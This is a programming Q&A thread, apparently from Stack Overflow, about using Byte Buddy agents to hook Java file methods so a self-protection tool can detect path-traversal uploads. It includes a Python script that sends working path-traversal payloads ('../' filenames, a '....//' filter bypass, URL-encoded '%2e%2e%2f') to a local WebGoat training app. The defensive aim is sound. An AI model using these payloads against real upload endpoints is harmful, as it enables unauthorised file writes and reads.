# bytebuddy hook upload file attack in java

Tags: java, webhooks, byte-buddy

the attack script:

```py
import requests
import json
import sys
import urllib
import urllib.request

headers = {
    'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36',
    'Cookie':'JSESSIONID=0V6z1FZvktzdwlqFbwGJ6MMhtuIK09MbrLzO6eZR;'
}

# 请求url
url_list = [
    'http://127.0.0.1:8080/WebGoat/PathTraversal/profile-upload',
    'http://127.0.0.1:8080/WebGoat/PathTraversal/profile-upload-fix',
    # 'http://127.0.0.1:8080/WebGoat/PathTraversal/random-picture?id=%2e%2e%2f%2e%2e%2fpath-traversal-secret'
    'http://127.0.0.1:8080/WebGoat/PathTraversal/random-picture?id=%2e%2e%2ftest_upload_2'
]

# 待上传文件，可以为任意类型
upload_file = '/home/amos/amos/test/phpto/php/1.jpg'

# 路径穿越
def post_file():
    url = url_list[0]
    # windows
    # file_name : 可以为本地任意类型文件（相应的更改 data 中 fullName 字段的文件后缀）
    file_name = upload_file
    # file_name = 'C:\\Users\\mi\\Desktop\\test_upload.txt'
    files = {'uploadedFile': open(file_name, 'rb')}
    data = {
        'fullName':'../test_uploadamos_1.jpg',
        'email':'test@test.com',
        'password':'test'
    }
    try:
        r = requests.post(url, headers=headers, files=files ,data = data)
        ret_data = json.loads(r.text)
        if ret_data['lessonCompleted'] == True:
            print('[*] file uploaded, check dirctory: .webgoat-8.1.0\PathTraversal')
        else:
            print('[*] file upload failed')
    except:
        print('[*] connect error')

# 双重编码
def post_file_2():
    url = url_list[1]
    file_name = upload_file
    files = {'uploadedFileFix': open(file_name, 'rb')}
    data = {
        'fullNameFix':'....//test_upload_2.jpg',
        'emailFix':'test@test.com',
        'passwordFix':'test'
    }
    try:
        r = requests.post(url, headers=headers, files=files ,data = data)
        ret_data = json.loads(r.text)
        if ret_data['lessonCompleted'] == True:
            print('[*] file uploaded, check dirctory: .webgoat-8.1.0\PathTraversal')
        else:
            print('[*] file upload failed')
    except:
        print('[*] connect error')

# url编码
def read_jpg():
    url = url_list[2]
    # url = 'http://127.0.0.1:8080/WebGoat/PathTraversal/random-picture?id=%2e%2e%2ftest_upload_2'
    try:
        request =urllib.request.Request(url, headers = headers, method="GET")
        response = urllib.request.urlopen(request)
        print(response.read())
        print('[*] Read the target jpg successfully')
    except:
        print('[*] connect error')

def main():
    if len(sys.argv) < 2:
        print('[*] input case')
        sys.exit()
    
    case = sys.argv[1]

    if case == '1':
        post_file()
    elif case == '2':
        post_file_2()
    elif case == '3':
        read_jpg()
    else:
        print('[*] case error')
        sys.exit()

if __name__ == '__main__':
    main()
amos@amosPC
```

now I use bytebuddy attempt to hook bottom method,and get attack scrpt input "../test_uploadamos_1.jpg". but it not work. the java code like this:

```java
@Override
public DynamicType.Builder<?> transform(DynamicType.Builder<?> builder, TypeDescription typeDescription, ClassLoader classLoader, JavaModule javaModule) {
      return builder
           .method(ElementMatchers.<MethodDescription>any())
           .intercept(MethodDelegation.to(Interceptor.class));
}

*********

 new AgentBuilder
       .Default()
       .type(ElementMatchers.<TypeDescription>nameStartsWith(TargetPackage.SQL_INJECTION_PACKAGE)
              .or(ElementMatchers.nameStartsWith(TargetPackage.FILE_OPERATE_PACKAGE)))
       .transform(transformer)
       .with(listener)
       .installOn(inst);

*************

private static List<String> getStrArgs(@Origin Method method, @AllArguments Object[] args){
     int argsNum = method.getParameterCount();
     List<String> strArgs = new ArrayList<>();
     logger.error("amos-file::::::::::::>>>>>>>>>>>>>>>>>>>>>>>>>>>"+method.toString());

     for (int i = 0; i < argsNum; i++){
         logger.error("amos-file-arg::::::::::::>>>>>>>>>>>>>>>>>>>>>>>>>>>"+args[i]);
         if(method.getParameterTypes()[i].toString().equals("class java.io.File")){
             strArgs.add(args[i].toString());
         }
     }
     return strArgs;
}
```

I want to get method that receive "../test_uploadamos_1.jpg" params, but never succeed.
I change `TargetPackage.FILE_OPERATE_PACKAGE` value to `java.io.File`,`java`,`org.appache` etc.., but no used.
I attempt get some message about hook point from baidu/openrasp ,but no used too.

for SQLInjection I set `TargetPackage.SQL_INJECTION_PACKAGE` value to `org.hsqldb.jdbc.JDBCStatement`, it's work.I can get user input params.

I appreciate if anyone can help me.

ps: the application is webgoat.

Answer (score 0):

You likely need to change the `.ignore(...)` parameter. By default, Byte Buddy does not instrument Java core classes. Method delegation will also unlikely work on them since your agent is loaded on the boot loader which cannot read from the system class loader.

If you want to instrument classes on the boot loader, you likely want to use `Advice` for your instrumentation.

Comment: Thank you, where can I get ``advice`` code template which can instrument classes on the boot loader.

Comment: You write these templates yourself. Since the code is inlined, it must be able to execute as if all linked code is on the same class loader. If you want to communicate with other code, you need to inject it into the boot loader.